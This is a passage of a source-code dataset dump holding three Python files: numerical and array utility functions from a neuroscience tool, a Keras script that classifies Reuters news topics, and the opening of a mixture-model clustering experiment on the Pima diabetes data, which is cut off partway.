np.int64(np.round(n))\n else: # it's a scalar, return as normal Python int\n return int(round(n))\n\ndef iterable(x):\n \"\"\"Check if the input is iterable, stolen from numpy.iterable()\"\"\"\n try:\n iter(x)\n return True\n except TypeError:\n return False\n\ndef toiter(x):\n \"\"\"Convert to iterable. If input is iterable, returns it. Otherwise returns it in a list.\n Useful when you want to iterate over something (like in a for loop),\n and you don't want to have to do type checking or handle exceptions\n when it isn't a sequence\"\"\"\n if iterable(x):\n return x\n else:\n return [x]\n\ndef tocontig(x):\n \"\"\"Return C contiguous copy of array x if it isn't C contiguous already\"\"\"\n if not x.flags.c_contiguous:\n x = x.copy()\n return x\n'''\n# use np.vstack instead:\ndef cvec(x):\n \"\"\"Return x as a column vector. x must be a scalar or a vector\"\"\"\n x = np.asarray(x)\n assert x.squeeze().ndim in [0, 1]\n try:\n nrows = len(x)\n except TypeError: # x is scalar?\n nrows = 1\n x.shape = (nrows, 1)\n return x\n'''\ndef is_empty(x):\n \"\"\"Check if sequence is empty. There really should be a np.is_empty function\"\"\"\n print(\"WARNING: not thoroughly tested!!!\")\n x = np.asarray(x)\n if np.prod(x.shape) == 0:\n return True\n else:\n return False\n\ndef cut(ts, trange):\n \"\"\"Returns timestamps, where tstart <= timestamps <= tend\n Copied and modified from neuropy rev 149\"\"\"\n lo, hi = argcut(ts, trange)\n return ts[lo:hi] # slice it\n\ndef argcut(ts, trange):\n \"\"\"Returns timestamp slice indices, where tstart <= timestamps <= tend\n Copied and modified from neuropy rev 149\"\"\"\n tstart, tend = trange[0], trange[1]\n '''\n # this is what we're trying to do:\n return ts[ (ts >= tstart) & (ts <= tend) ]\n ts.searchsorted([tstart, tend]) method does it faster, because it assumes ts are ordered.\n It returns an index where the values would fit in ts. The index is such that\n ts[index-1] < value <= ts[index]. In this formula ts[ts.size]=inf and ts[-1]= -inf\n '''\n lo, hi = ts.searchsorted([tstart, tend]) # indices where tstart and tend would fit in ts\n # can probably avoid all this end inclusion code by using the 'side' kwarg,\n # not sure if I want end inclusion anyway:\n '''\n if tend == ts[min(hi, len(ts)-1)]:\n # if tend matches a timestamp (protect from going out of index bounds when checking)\n hi += 1 # inc to include a timestamp if it happens to exactly equal tend.\n # This gives us end inclusion\n hi = min(hi, len(ts)) # limit hi to max slice index (==max value index + 1)\n '''\n return lo, hi\n\ndef eucd(coords):\n \"\"\"Generates Euclidean distance matrix from a\n sequence of n m-dimensional coordinates. Nice and fast.\n Written by Willi Richert\n Taken from:\n http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/498246\n on 2006/11/11\n \"\"\"\n coords = np.asarray(coords)\n n, m = coords.shape\n delta = np.zeros((n, n), dtype=np.float64)\n for d in xrange(m):\n data = coords[:, d]\n delta += (data - data[:, np.newaxis]) ** 2\n return np.sqrt(delta)\n\ndef revcmp(x, y):\n \"\"\"Does the reverse of cmp():\n Return negative if yx\"\"\"\n return cmp(y, x)\n\n\nclass Gaussian(object):\n \"\"\"Gaussian function, works with ndarray inputs\"\"\"\n def __init__(self, mu, sigma):\n self.mu = mu\n self.sigma = sigma\n\n def __call__(self, x):\n \"\"\"Called when self is called as a f'n.\n Don't bother normalizing by 1/(sigma*np.sqrt(2*pi)),\n don't care about normalizing the integral,\n just want to make sure that f(0) == 1\"\"\"\n return np.exp( -(x-self.mu)**2 / (2*self.sigma**2) )\n\n def __getitem__(self, x):\n \"\"\"Called when self is indexed into\"\"\"\n return self(x)\n\n\ndef g(x0, sx, x):\n \"\"\"1-D Gaussian\"\"\"\n return np.exp( -(x-x0)**2 / (2*sx**2) )\n\ndef g2(x0, y0, sx, sy, x, y):\n \"\"\"2-D Gaussian\"\"\"\n arg = -(x-x0)**2 / (2*sx**2) - (y-y0)**2 / (2*sy**2)\n return np.exp(arg)\n\ndef g3(x0, y0, z0, sx, sy, sz, x, y, z):\n \"\"\"3-D Gaussian\"\"\"\n return np.exp( -(x-x0)**2 / (2*sx**2) - (y-y0)**2 / (2*sy**2) - (z-z0)**2 / (2*sz**2) )\n\ndef cauchy(x0, gx, x):\n \"\"\"1-D Cauchy. See http://en.wikipedia.org/wiki/Cauchy_distribution\"\"\"\n #return INVPI * gx/((x-x0)**2+gx**2)\n gx2 = gx * gx\n return gx2 / ((x-x0)**2 + gx2)\n\ndef cauchy2(x0, y0, gx, gy, x, y):\n \"\"\"2-D Cauchy\"\"\"\n #return INVPI * gx/((x-x0)**2+gx**2) * gy/((y-y0)**2+gy**2)\n return (gx*gy)**2 / ((x-x0)**2 + gx**2) / ((y-y0)**2 + gy**2)\n\ndef Vf(Im, x0, y0, z0, sx, sy, sz, x, y, z):\n \"\"\"1/r voltage decay function in 2D space\n What to do with the singularity so that the leastsq gets a smooth differentiable f'n?\"\"\"\n #if np.any(x == x0) and np.any(y == y0) and np.any(z == z0):\n # raise ValueError, 'V undefined at singularity'\n return Im / (4*pi) / np.sqrt( sx**2 * (x-x0)**2 + sy**2 * (y-y0)**2 + sz**2 * (z-z0)**2)\n\ndef dgdmu(mu, sigma, x):\n \"\"\"Partial of g wrt mu\"\"\"\n return (x - mu) / sigma**2 * g(mu, sigma, x)\n\ndef dgdsigma(mu, sigma, x):\n \"\"\"Partial of g wrt sigma\"\"\"\n return (x**2 - 2*x*mu + mu**2) / sigma**3 * g(mu, sigma, x)\n\ndef dg2dx0(x0, y0, sx, sy, x, y):\n \"\"\"Partial of g2 wrt x0\"\"\"\n return g(y0, sy, y) * dgdmu(x0, sx, x)\n\ndef dg2dy0(x0, y0, sx, sy, x, y):\n \"\"\"Partial of g2 wrt y0\"\"\"\n return g(x0, sx, x) * dgdmu(y0, sy, y)\n\ndef dg2dsx(x0, y0, sx, sy, x, y):\n \"\"\"Partial of g2 wrt sx\"\"\"\n return g(y0, sy, y) * dgdsigma(x0, sx, x)\n\ndef dg2dsy(x0, y0, sx, sy, x, y):\n \"\"\"Partial of g2 wrt sy\"\"\"\n return g(x0, sx, x) * dgdsigma(y0, sy, y)\n\ndef RM(theta):\n \"\"\"Return 2D (2x2) rotation matrix, with theta counterclockwise rotation in radians\"\"\"\n return np.array([[np.cos(theta), -np.sin(theta)], [np.sin(theta), np.cos(theta)]])\n\n\nclass Poo(object):\n \"\"\"Poo function, works with ndarray inputs\"\"\"\n def __init__(self, a, b, c):\n self.a = a\n self.b = b\n self.c = c\n\n def __call__(self, x):\n \"\"\"Called when self is called as a f'n\"\"\"\n return (1+self.a*x) / (self.b+self.c*x**2)\n\n def __getitem__(self, x):\n \"\"\"Called when self is indexed into\"\"\"\n return self(x)\n\n\ndef hamming(t, N):\n \"\"\"Return y values of Hamming window at sample points t\"\"\"\n #if N == None:\n # N = (len(t) - 1) / 2\n return 0.54 - 0.46 * np.cos(pi * (2*t + N)/N)\n\ndef hex2rgb(hexcolours):\n \"\"\"Convert colours RGB hex string list into an RGB int array\"\"\"\n hexcolours = toiter(hexcolours)\n rgb = []\n for s in hexcolours:\n s = s[len(s)-6:len(s)] # get last 6 characters\n r, g, b = s[0:2], s[2:4], s[4:6]\n r, g, b = int(r, base=16), int(g, base=16), int(b, base=16)\n rgb.append((r, g, b))\n return np.uint8(rgb)\n\ndef hex2rgba(hexcolours, alpha=255):\n \"\"\"Convert colours RGB hex string list into an RGBA int array\"\"\"\n assert type(alpha) == int and 0 <= alpha <= 255\n rgb = hex2rgb(hexcolours)\n alphas = np.repeat(alpha, len(rgb))\n alphas.shape = -1, 1 # make it 2D column vector\n return np.concatenate([rgb, alphas], axis=1)\n\ndef hex2floatrgba(hexcolours, alpha=255):\n \"\"\"Convert colours RGB hex string list into an RGBA float array\"\"\"\n assert type(alpha) == int and 0 <= alpha <= 255\n rgba = hex2rgba(hexcolours, alpha)\n return np.float64(rgba) / 255.\n\ndef rgb2hex(rgbcolours):\n \"\"\"Convert RGB int array into a hex string list\"\"\"\n rgbcolours = toiter(rgbcolours)\n hx = []\n for rgb in rgbcolours:\n r, g, b = rgb\n h = hex(r*2**16 + g*2**8 + b)\n h = lrstrip(h, '0x', 'L')\n pad = (6 - len(h)) * '0'\n h = '#' + pad + h\n hx.append(h)\n return hx\n\nc = np.cos\ns = np.sin\n\ndef Rx(t):\n \"\"\"Rotation matrix around x axis, theta in radians\"\"\"\n return np.matrix([[1, 0, 0 ],\n [0, c(t), -s(t)],\n [0, s(t), c(t)]])\n\ndef Ry(t):\n \"\"\"Rotation matrix around y axis, theta in radians\"\"\"\n return np.matrix([[ c(t), 0, s(t)],\n [ 0, 1, 0 ],\n [-s(t), 0, c(t)]])\n\ndef Rz(t):\n \"\"\"Rotation matrix around z axis, theta in radians\"\"\"\n return np.matrix([[c(t), -s(t), 0],\n [s(t), c(t), 0],\n [0, 0, 1]])\n\ndef R(tx, ty, tz):\n \"\"\"Return full 3D rotation matrix, given thetas in degress.\n Mayavi (tvtk actually) rotates axes in Z, X, Y order, for\n some unknown reason. So, we have to do the same. See:\n tvtk_classes.zip/actor.py:32\n tvtk_classes.zip/prop3d.py:67\n \"\"\"\n # convert to radians, then take matrix product\n return Rz(tz*pi/180)*Rx(tx*pi/180)*Ry(ty*pi/180)\n'''\ndef normdeg(angle):\n return angle % 360\n\ndef win2posixpath(path):\n path = path.replace('\\\\', '/')\n path = os.path.splitdrive(path)[-1] # remove drive name from start\n return path\n\ndef oneD2D(a):\n \"\"\"Convert 1D array to 2D array. Can do this just as easily using a[None, :]\"\"\"\n a = a.squeeze()\n assert a.ndim == 1, \"array has more than one non-singleton dimension\"\n a.shape = 1, len(a) # make it 2D\n return a\n\ndef twoD1D(a):\n \"\"\"Convert trivially 2D array to 1D array. Seems unnecessary. Just call squeeze()\"\"\"\n a = a.squeeze()\n assert a.ndim == 1, \"array has more than one non-singleton dimension\"\n return a\n'''\ndef is_unique(a):\n \"\"\"Check whether a has purely unique values in it\"\"\"\n u = np.unique(a)\n if len(a) != len(u):\n return False\n else:\n return True\n\ndef intersect1d(arrays, assume_unique=False):\n \"\"\"Find the intersection of any number of 1D arrays.\n Return the sorted, unique values that are in all of the input arrays.\n Adapted from numpy.lib.arraysetops.intersect1d\"\"\"\n N = len(arrays)\n if N == 0:\n return np.asarray(arrays)\n arrays = list(arrays) # allow assignment\n if not assume_unique:\n for i, arr in enumerate(arrays):\n arrays[i] = np.unique(arr)\n aux = np.concatenate(arrays) # one long 1D array\n aux.sort() # sorted\n if N == 1:\n return aux\n shift = N-1\n return aux[aux[shift:] == aux[:-shift]]\n\ndef rowtake(a, i):\n \"\"\"For each row in a, return values according to column indices in the\n corresponding row in i. Returned shape == i.shape\"\"\"\n assert a.ndim == 2\n assert i.ndim <= 2\n '''\n if i.ndim == 1:\n j = np.arange(a.shape[0])\n else: # i.ndim == 2\n j = np.repeat(np.arange(a.shape[0]), i.shape[1])\n j.shape = i.shape\n j *= a.shape[1]\n j += i\n return a.flat[j]\n '''\n # this is about 3X faster:\n if i.ndim == 1:\n return a[np.arange(a.shape[0]), i]\n else: # i.ndim == 2\n return a[np.arange(a.shape[0])[:, None], i]\n\ndef td2usec(td):\n \"\"\"Convert datetime.timedelta to microseconds\"\"\"\n sec = td.total_seconds() # float\n usec = intround(sec * 1000000) # round to nearest us\n return usec\n\ndef td2days(td):\n \"\"\"Convert datetime.timedelta to days\"\"\"\n sec = td.total_seconds() # float\n days = sec / 3600 / 24\n return days\n\ndef issorted(x):\n \"\"\"Check if x is sorted\"\"\"\n try:\n if x.dtype.kind == 'u':\n # x is unsigned int array, risk of int underflow in np.diff\n x = np.int64(x)\n except AttributeError:\n pass # no dtype, not an array\n return (np.diff(x) >= 0).all() # is difference between consecutive entries >= 0?\n # or, you could compare the array to an explicitly sorted version of itself,\n # and see if they're identical\n\ndef concatenate_destroy(arrs):\n \"\"\"Concatenate list of arrays along 0th axis, destroying them in the process.\n Doesn't duplicate everything in arrays, as does numpy.concatenate. Only\n temporarily duplicates one array at a time, saving memory\"\"\"\n if type(arrs) != list:\n raise TypeError('arrays must be in a list')\n #arrs = list(arrs) # don't do this! this prevents destruction of the original arrs\n nrows = 0\n subshape = arrs[0].shape[1::] # dims excluding concatenation dim\n dtype = arrs[0].dtype\n # ensure all arrays in arrs are compatible:\n for i, a in enumerate(arrs):\n nrows += len(a)\n if a.shape[1::] != subshape:\n raise TypeError(\"array %d has subshape %r instead of %r\" %\n (i, a.shape[1::], subshape))\n if a.dtype != dtype:\n raise TypeError(\"array %d has dtype %r instead of %r\" % (i, a.dtype, dtype))\n subshape = list(subshape)\n shape = [nrows] + subshape\n\n # unlike np.zeros, it seems np.empty doesn't allocate real memory, but does temporarily\n # allocate virtual memory, which is then converted to real memory as 'a' is filled:\n try:\n a = np.empty(shape, dtype=dtype) # empty only allocates virtual memory\n except MemoryError:\n raise MemoryError(\"concatenate_destroy: not enough virtual memory to allocate \"\n \"destination array. Create/grow swap file?\")\n \n rowi = 0\n for i in range(len(arrs)):\n arr = arrs.pop(0)\n nrows = len(arr)\n a[rowi:rowi+nrows] = arr # concatenate along 0th axis\n rowi += nrows\n return a\n\ndef lst2shrtstr(lst, sigfigs=4, brackets=False):\n \"\"\"Return string representation of list, replacing any floats with potentially\n shorter representations with fewer sig figs. Any string items in list will be\n simplified by having their quotes removed\"\"\"\n gnumfrmt = string.join(['%.', str(sigfigs), 'g'], sep='')\n strlst = []\n for val in lst:\n try:\n strlst.append(gnumfrmt % val)\n except TypeError:\n strlst.append(val) # val isn't a general number\n s = string.join(strlst, sep=', ')\n if brackets:\n s = string.join(['[', s, ']'], sep='')\n return s\n\ndef rms(a, axis=None):\n \"\"\"Return root-mean-squared value of array a along axis\"\"\"\n return np.sqrt(np.mean(a**2, axis))\n\ndef rmserror(a, b, axis=None):\n \"\"\"Return root-mean-squared error between arrays a and b\"\"\"\n return rms(a - b, axis=axis)\n\ndef lstrip(s, strip):\n \"\"\"What I think str.lstrip should really do\"\"\"\n if s.startswith(strip):\n return s[len(strip):] # strip it\n else:\n return s\n\ndef rstrip(s, strip):\n \"\"\"What I think str.rstrip should really do\"\"\"\n if s.endswith(strip):\n return s[:-len(strip)] # strip it\n else:\n return s\n\ndef strip(s, strip):\n \"\"\"What I think str.strip should really do\"\"\"\n return rstrip(lstrip(s, strip), strip)\n\ndef lrstrip(s, lstr, rstr):\n \"\"\"Strip lstr from start of s and rstr from end of s\"\"\"\n return rstrip(lstrip(s, lstr), rstr)\n\ndef pad(x, align=8):\n \"\"\"Pad x with null bytes so it's a multiple of align bytes long\"\"\"\n if type(x) == str: # or maybe unicode?\n return padstr(x, align=align)\n elif type(x) == np.ndarray:\n return padarr(x, align=align)\n else:\n raise TypeError('Unhandled type %r in pad()')\n\ndef padstr(x, align=8):\n \"\"\"Pad string x with null bytes so it's a multiple of align bytes long\"\"\"\n nbytes = len(x)\n rem = nbytes % align\n npadbytes = align - rem if rem else 0 # nbytes to pad with for 8 byte alignment\n if npadbytes == 0:\n return x\n x = x.encode('ascii') # ensure it's pure ASCII, where each char is 1 byte\n x += '\\0' * npadbytes # returns a copy, doesn't modify in place\n assert len(x) % align == 0\n return x\n\ndef padarr(x, align=8):\n \"\"\"Flatten array x and pad with null bytes so it's a multiple of align bytes long\"\"\"\n nitems = len(x.ravel())\n nbytes = x.nbytes\n dtypenbytes = x.dtype.itemsize\n rem = nbytes % align\n npadbytes = align - rem if rem else 0 # nbytes to pad with for 8 byte alignment\n if npadbytes == 0:\n return x\n if npadbytes % dtypenbytes != 0:\n raise RuntimeError(\"Can't pad %d byte array to %d byte alignment\" %\n (dtypenbytes, align))\n npaditems = npadbytes / dtypenbytes\n x = x.ravel().copy() # don't modify in place\n # pads with npaditems zeros, each of length dtypenbytes:\n x.resize(nitems + npaditems, refcheck=False)\n assert x.nbytes % align == 0\n return x\n\ndef shiftpad(a, n):\n \"\"\"Horizontally shift 2D array a *in-place* by n points. -ve n shifts\n left, +ve shifts right. Pad with edge values at the appropriate end.\n This is probably the same as np.roll(), except edge values are padded\n instead of wrapped. Also, I think np.roll returns a copy\"\"\"\n assert a.ndim == 2\n assert type(n) == int\n assert n != 0\n if n > 0: # shift right, pad with left edge\n ledge = a[:, 0, None] # keep it 2D (nrows x 1)\n a[:, n:] = a[:, :-n] # throw away right edge\n a[:, 1:n] = ledge # pad with left edge\n else: # n < 0, shift left, pad with right edge\n redge = a[:, -1, None] # keep it 2D (nrows x 1)\n a[:, :n] = a[:, -n:] # throw away left edge\n a[:, n:-1] = redge # pad with right edge\n # no need to return anything\n\ndef rollwin(a, width):\n \"\"\"Return a.nd + 1 dimensional array, where the last dimension contains\n consecutively shifted windows of a of the given width, each shifted by 1\n along the last dimension of a. This allows for calculating rolling stats,\n as well as searching for the existence and position of subarrays in a\n larger array, all without having to resort to Python loops or making\n copies of a.\n\n Taken from:\n http://www.rigtorp.se/2011/01/01/rolling-statistics-numpy.html\n http://stackoverflow.com/questions/7100242/python-numpy-first-occurrence-of-subarray\n http://stackoverflow.com/questions/6811183/rolling-window-for-1d-arrays-in-numpy\n\n Ex 1:\n >>> x = np.arange(10).reshape((2,5))\n >>> rollwin(x, 3)\n array([[[0, 1, 2], [1, 2, 3], [2, 3, 4]],\n [[5, 6, 7], [6, 7, 8], [7, 8, 9]]]) \n >>> np.mean(rollwin(x, 3), -1)\n array([[ 1., 2., 3.],\n [ 6., 7., 8.]])\n\n Ex 2:\n >>> a = np.arange(10)\n >>> np.random.shuffle(a)\n >>> a\n array([7, 3, 6, 8, 4, 0, 9, 2, 1, 5])\n >>> rollwin(a, 3) == [8, 4, 0]\n array([[False, False, False],\n [False, False, False],\n [False, False, False],\n [ True, True, True],\n [False, False, False],\n [False, False, False],\n [False, False, False],\n [False, False, False]], dtype=bool)\n >>> np.all(rollwin(a, 3) == [8, 4, 0], axis=1)\n array([False, False, False, True, False, False, False, False], dtype=bool)\n >>> np.where(np.all(rollwin(a, 3) == [8, 4, 0], axis=1))[0][0]\n 3\n \"\"\"\n shape = a.shape[:-1] + (a.shape[-1] - width + 1, width)\n strides = a.strides + (a.strides[-1],)\n return np.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)\n\ndef rollwin2D(a, width):\n \"\"\"A modified version of rollwin. Allows for easy columnar search of 2D\n subarray b within larger 2D array a, assuming both have the same number of\n rows.\n \n Ex:\n >>> a\n array([[44, 89, 34, 67, 11, 92, 22, 72, 10, 81],\n [52, 40, 29, 35, 67, 10, 24, 23, 65, 51],\n [70, 58, 14, 34, 11, 66, 47, 68, 11, 56],\n [70, 55, 47, 30, 39, 79, 71, 70, 67, 33]]) \n >>> b\n array([[67, 11, 92],\n [35, 67, 10],\n [34, 11, 66],\n [30, 39, 79]])\n >>> np.where((rollwin2D(a, 3) == b).all(axis=1).all(axis=1))[0]\n array([3])\n \"\"\"\n assert a.ndim == 2\n shape = (a.shape[1] - width + 1, a.shape[0], width)\n strides = (a.strides[-1],) + a.strides\n return np.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)\n\ndef argcolsubarr2D(a, b):\n \"\"\"Return column index of smaller subarray b within bigger array a. Both\n must be 2D and have the same number of rows. Raises IndexError if b is not\n a subarray of a\"\"\"\n assert a.ndim == b.ndim == 2\n assert a.shape[0] == b.shape[0] # same nrows\n width = b.shape[1] # ncols in b\n return np.where((rollwin2D(a, width) == b).all(axis=1).all(axis=1))[0]\n\ndef lrrep2Darrstripis(a):\n \"\"\"Return left and right slice indices that strip repeated values from all rows\n from left and right ends of 2D array a, such that a[:, lefti:righti] gives you\n the stripped version.\n\n Ex:\n >>> a\n array([[44, 44, 44, 44, 89, 34, 67, 11, 92, 22, 72, 10, 81, 81, 81],\n [52, 52, 52, 52, 40, 29, 35, 67, 10, 24, 23, 65, 51, 51, 51],\n [70, 70, 70, 70, 58, 14, 34, 11, 66, 47, 68, 11, 56, 56, 56],\n [70, 70, 70, 70, 55, 47, 30, 39, 79, 71, 70, 67, 33, 33, 33]])\n >>> lrrep2Darrstripis(a)\n (3, -2)\n \"\"\"\n assert a.ndim == 2\n left = a[:, :1] # 2D column vector\n right = a[:, -1:] # 2D column vector\n leftcolis = argcolsubarr2D(a, left)\n lefti = 0 # at least 1 hit, at the far left edge\n if len(leftcolis) > 1: # multiple hits, get slice index of rightmost consecutive hit\n consecis = np.where(np.diff(leftcolis) == 1)[0]\n if len(consecis) > 0:\n lefti = max(consecis) + 1\n rightcolis = argcolsubarr2D(a, right)\n righti = a.shape[1] # at least 1 hit, at the far right edge\n if len(rightcolis) > 1: # multiple hits, get slice index of leftmost consecutive hit\n consecis = np.where(np.diff(rightcolis)[::-1] == 1)[0]\n if len(consecis) > 0:\n righti = -(max(consecis) + 1)\n return lefti, righti\n\ndef normpdf(p, lapcorrect=1e-10):\n \"\"\"Ensure p is normalized (sums to 1). Return p unchanged if it's already normalized.\n Otherwise, return it normalized. I guess this treats p as a pmf, not strictly a pdf.\n Optional apply Laplacian correction to avoid 0s\"\"\"\n p = np.float64(p) # copy and ensure it's float before modifying in-place\n if lapcorrect and (p == 0).any():\n p += lapcorrect\n psum = p.sum()\n if not np.allclose(psum, 1.0) and psum > 0: # make sure the probs sum to 1\n #print(\"p sums to %f instead of 1, normalizing\" % psum)\n p /= psum\n return p\n\ndef DKL(p, q):\n \"\"\"Kullback-Leibler divergence from true probability distribution p to arbitrary\n distribution q\"\"\"\n assert len(p) == len(q)\n p, q = normpdf(np.asarray(p)), normpdf(np.asarray(q))\n return sum(p * np.log2(p/q))\n \ndef DJS(p, q):\n \"\"\"Jensen-Shannon divergence, a symmetric measure of divergence between\n distributions p and q\"\"\"\n assert len(p) == len(q)\n p, q = normpdf(np.asarray(p)), normpdf(np.asarray(q))\n m = (p + q) / 2\n return (DKL(p, m) + DKL(q, m)) / 2\n\ndef updatenpyfilerows(fname, rows, arr):\n \"\"\"Given a numpy formatted binary file (usually with .npy extension,\n but not necessarily), update 0-based rows (first dimension) of the\n array stored in the file from arr. Works for arrays of any rank >= 1\"\"\"\n assert len(arr) >= 1 # has at least 1 row\n f = open(fname, 'r+b') # open in read+write binary mode\n # get .npy format version:\n major, minor = np.lib.format.read_magic(f)\n assert (major == 1 and minor == 0)\n # read header to move file pointer to start of array in file\n shape, fortran_order, dtype = np.lib.format.read_array_header_1_0(f)\n assert shape == arr.shape\n assert fortran_order == np.isfortran(arr)\n assert dtype == arr.dtype\n arroffset = f.tell()\n rowsize = arr[0].size * dtype.itemsize # nbytes per row\n # sort rows so that we move efficiently from start to end of file\n rows = sorted(rows) # rows might be a set, list, tuple, or array, convert to list\n # update rows in file\n for row in rows:\n f.seek(arroffset + row*rowsize) # seek from start of file, row is 0-based\n f.write(arr[row])\n f.close()\n","sub_path":"spyke/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":90864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"159229416","text":"from keras import models, layers, optimizers, losses, metrics\nfrom keras.datasets import reuters\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef vectorize_sequences(sequences, dimension=10000):\n results = np.zeros((len(sequences), dimension))\n\n # set all apearant words to 1\n for i, sequence in enumerate(sequences):\n results[i,sequence] = 1.\n \n return results\n\ndef to_one_hot(labels, dimension=46):\n results = np.zeros((len(labels), dimension))\n\n for i,label in enumerate(labels):\n results[i,label]=1.\n\n return results\n\n\n# load datasets\n(train_data, train_labels),(test_data, test_labels) = reuters.load_data(num_words=10000)\n\n# preprocess data\nx_train = vectorize_sequences(train_data)\nx_test = vectorize_sequences(test_data)\n\ny_train = to_one_hot(train_labels)\ny_test = to_one_hot(test_labels)\n\n# leave some data for validation\nx_val = x_train[:1000] # validation set\npartial_x_train = x_train[1000:] # train set\n\ny_val = y_train[:1000] # validation set\npartial_y_train = y_train[1000:] # train set\n\n# construct dl model\nmodel = models.Sequential()\nmodel.add(layers.Dense(64, activation='relu', input_shape=(10000, )))\nmodel.add(layers.Dense(64, activation='relu'))\nmodel.add(layers.Dense(64, activation='relu'))\nmodel.add(layers.Dense(46, activation='sigmoid'))\n\nmodel.compile( optimizer='RMSprop', \n loss='categorical_crossentropy',\n metrics=['accuracy'])\n \n\n# train model\nhistory = model.fit(partial_x_train,\n partial_y_train,\n epochs=9,\n batch_size=512,\n validation_data=(x_val,y_val))\n\n# plot train loss \nhistory_dict = history.history\nloss_values = history_dict['loss']\nval_loss_values = history_dict['val_loss']\n\nepochs = range(1,len(loss_values) + 1)\n\nplt.plot(epochs, loss_values, 'bo', label='Training loss')\nplt.plot(epochs, val_loss_values, 'b', label='Validation loss')\nplt.title('Training and validation loss')\nplt.xlabel('Epochs')\nplt.ylabel('Loss')\nplt.legend()\n\nplt.show()\n\n# test\n# mode.predict(x_test)\nresults = model.evaluate(x_test, y_test)\nprint(results)","sub_path":"tensorflow/deep_learning_with_python/03_05_reuters.py","file_name":"03_05_reuters.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"459298730","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jun 8 13:25:11 2020\r\n\r\n@author: rfuchs\r\n\"\"\"\r\n\r\nimport os \r\n\r\nos.chdir('C:/Users/rfuchs/Documents/GitHub/MDGMM_suite/M1DGMM')\r\n\r\nfrom copy import deepcopy\r\n\r\nfrom sklearn.metrics import precision_score\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.preprocessing import LabelEncoder \r\nfrom sklearn.preprocessing import OneHotEncoder\r\n\r\nfrom gower import gower_matrix\r\nfrom sklearn.metrics import silhouette_score\r\n\r\n\r\nimport pandas as pd\r\n\r\nfrom m1dgmm import M1DGMM\r\nfrom init_params import dim_reduce_init\r\nfrom metrics import misc, cluster_purity\r\nfrom data_preprocessing import gen_categ_as_bin_dataset, \\\r\n compute_nj\r\n\r\nimport autograd.numpy as np\r\n\r\n\r\n###############################################################################\r\n######################## Pima data vizualisation #########################\r\n###############################################################################\r\n\r\n#===========================================#\r\n# Importing data\r\n#===========================================#\r\nos.chdir('C:/Users/rfuchs/Documents/These/Stats/mixed_dgmm/datasets')\r\n\r\npima = pd.read_csv('pima/pima_indians.csv', sep = ',')\r\ny = pima.iloc[:,:-1]\r\nlabels = pima.iloc[:,-1]\r\n\r\ny = y.infer_objects()\r\nnumobs = len(y)\r\n\r\n\r\nn_clusters = len(np.unique(labels))\r\np = y.shape[1]\r\n\r\n#===========================================#\r\n# Formating the data\r\n#===========================================#\r\nvar_distrib = np.array(['ordinal', 'continuous', 'continuous', 'continuous',\\\r\n 'continuous', 'continuous', 'continuous', 'continuous']) \r\n \r\n# Ordinal data already encoded\r\n \r\ny_categ_non_enc = deepcopy(y)\r\nvd_categ_non_enc = deepcopy(var_distrib)\r\n\r\n# No categ data\r\n# No binary data \r\n\r\nenc = OneHotEncoder(sparse = False, drop = 'first')\r\nlabels_oh = enc.fit_transform(np.array(labels).reshape(-1,1)).flatten()\r\n\r\nnj, nj_bin, nj_ord, n_categ = compute_nj(y, var_distrib)\r\ny_np = y.values\r\nnb_cont = np.sum(var_distrib == 'continuous')\r\n\r\np_new = y.shape[1]\r\n\r\n# Feature category (cf)\r\ncf_non_enc = np.logical_or(vd_categ_non_enc == 'categorical', vd_categ_non_enc == 'bernoulli')\r\n\r\n# Non encoded version of the dataset:\r\ny_nenc_typed = y_categ_non_enc.astype(np.object)\r\ny_np_nenc = y_nenc_typed.values\r\n\r\n# Defining distances over the non encoded features\r\ndm = gower_matrix(y_nenc_typed, cat_features = cf_non_enc) \r\n\r\ndtype = {y.columns[j]: np.float64 if (var_distrib[j] != 'bernoulli') and \\\r\n (var_distrib[j] != 'categorical') else np.str for j in range(p_new)}\r\n\r\ny = y.astype(dtype, copy=True)\r\n\r\n#===========================================#\r\n# Running the algorithm\r\n#===========================================# \r\n\r\nr = np.array([3, 2, 1])\r\nnumobs = len(y)\r\nk = [4, n_clusters]\r\n\r\nseed = 1\r\ninit_seed = 2\r\n \r\neps = 1E-05\r\nit = 20\r\nmaxstep = 100\r\n\r\n\r\nprince_init = dim_reduce_init(y, n_clusters, k, r, nj, var_distrib, seed = None,\\\r\n use_famd=True)\r\nm, pred = misc(labels_oh, prince_init['classes'], True) \r\nprint(m)\r\nprint(confusion_matrix(labels_oh, pred))\r\nprint(silhouette_score(dm, pred, metric = 'precomputed'))\r\n\r\n\r\nout = M1DGMM(y_np, n_clusters, r, k, prince_init, var_distrib, nj, it, eps, \\\r\n maxstep, seed, perform_selec = False)\r\nm, pred = misc(labels_oh, out['classes'], True) \r\nprint(m)\r\nprint(confusion_matrix(labels_oh, pred))\r\nprint(silhouette_score(dm, pred, metric = 'precomputed'))\r\n\r\n# Plot the final groups\r\n\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\ncolors = ['green','red']\r\n\r\nfig = plt.figure(figsize=(8,8))\r\nplt.scatter(out[\"z\"][:, 0], out[\"z\"][:, 1], c=pred,\\\r\n cmap=matplotlib.colors.ListedColormap(colors))\r\n\r\ncb = plt.colorbar()\r\ncb.ax.get_yaxis().set_ticks([])\r\nfor j, lab in enumerate(['absence','presence']):\r\n cb.ax.text(.5, (2 * j + 1) / 4.0, lab, ha='center', va='center', rotation=90)\r\ncb.ax.get_yaxis().labelpad = 15\r\n\r\n\r\n#=========================================================================\r\n# Performance measure : Finding the best specification for init and DDGMM\r\n#=========================================================================\r\n\r\nres_folder = 'C:/Users/rfuchs/Documents/These/Experiences/mixed_algos/pima'\r\n\r\n\r\n# Init\r\n# Best one r = (2,1)\r\nnumobs = len(y)\r\nk = [n_clusters]\r\n\r\nnb_trials= 30\r\nmca_res = pd.DataFrame(columns = ['it_id', 'r', 'micro', 'macro', 'purity'])\r\n\r\nfor r1 in range(2, 9):\r\n print(r1)\r\n r = 